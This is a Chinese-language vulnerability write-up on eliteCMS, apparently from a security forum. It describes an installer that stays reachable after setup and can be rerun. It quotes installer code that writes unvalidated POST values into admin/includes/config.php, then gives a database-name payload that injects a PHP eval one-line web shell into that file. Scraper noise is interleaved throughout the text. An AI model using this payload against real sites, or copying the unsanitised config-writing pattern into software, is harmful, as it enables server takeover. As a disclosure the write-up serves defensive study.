eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
3 ?& K" h+ F* l
/ Y1 G! ^! ]9 X% i, p3 G2 d另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
1 M0 l. M3 O. k4 e7 J1 a我们来看代码:8 c% d3 _+ b4 y6 l. V% _8 k7 t4 j4 q
, r- i5 A& z8 o! h...& W; z& ~: _& ]) X/ z7 @7 c
elseif ($_GET['step'] == "4") {2 X# r, O' n( f
$file = "../admin/includes/config.php";
# D) [$ y. Q! Y' q $write = "<?php\n";: Z" \+ J9 ]/ h: ~" L; @, c1 g
$write .= "/**\n";
6 p% f! [3 t/ K% C1 v $write .= "*\n";# d6 P6 f7 z$ i) f( j
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";! ]" G6 M4 P0 U1 l6 f8 S
...略...
0 C; B9 z3 E! ] $write .= "*\n";: t7 V- {2 N3 `1 O' J
$write .= "*/\n";
) C1 f+ f/ B# Y( F $write .= "\n";
7 f9 ]% w( m* g $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";2 O$ }( i% L% s3 R
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
( o8 M. M4 c1 N# k- R# K $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";* W7 [# o& ]& J' D
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";3 T: U6 I; g. }
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";7 l' C5 U, H7 p& c" {0 q! ]
$write .= "if (!\$connection) {\n";" H; R5 ^$ ~/ p( O/ l
$write .= " die(\"Database connection failed\" .mysql_error());\n";
d$ V" G, F1 o4 f% D# a $write .= " \n";
8 Y* F* v4 r. ^: W $write .= "} \n";
9 h/ {. x8 G f u $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";: J& _3 B# a& t/ `
$write .= "if (!\$db_select) {\n";/ N5 `, }5 l: H* X* r0 B5 o7 D, p
$write .= " die(\"Database select failed\" .mysql_error());\n";
1 V. W7 R, r3 ]( _ $write .= " \n";9 e$ ?, |" \3 v( J& R5 T8 {
$write .= "} \n";1 w6 \8 x; K1 ~3 v! I
$write .= "?>\n";7 V/ U* i( y# B' I4 s1 X$ t( f
# }6 j5 i6 ?9 O& L
$writer = fopen($file, 'w');
5 b7 Q! C9 E, a+ W) J6 R. ^...
6 j5 K, }8 ]- s6 ~! z6 l2 m& U' T& D
, o, [% r8 p( A! z p) X在看代码:( U% o Y- R; c% J0 M
# t' U# [: Z. F' Q( p$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];/ R9 r) l. M5 p* c4 `% |0 X/ w6 {
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
9 T- |7 v. S+ Q3 n/ C$_SESSION['DB_USER'] = $_POST['DB_USER'];2 ?3 J0 k+ M$ s' l- b/ T8 @# R- i3 r
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];- L0 R- z) z- B, W( |" L6 s& Z
: E+ t. W4 [! |; j1 g取值未作任何验证1 q8 Y' X+ v% n9 I8 D
如果将数据库名POST数据:
2 _9 w( S" m! r5 ~) e! l
& n6 G4 T& W- p"?><?php eval($_POST[c]);?><?php
4 V" z f' C$ r5 b1 B( ^: O) N w# H) ?+ [* q' `
将导致一句话后门写入/admin/includes/config.php
. m- t$ N1 ~0 T; U( q) s |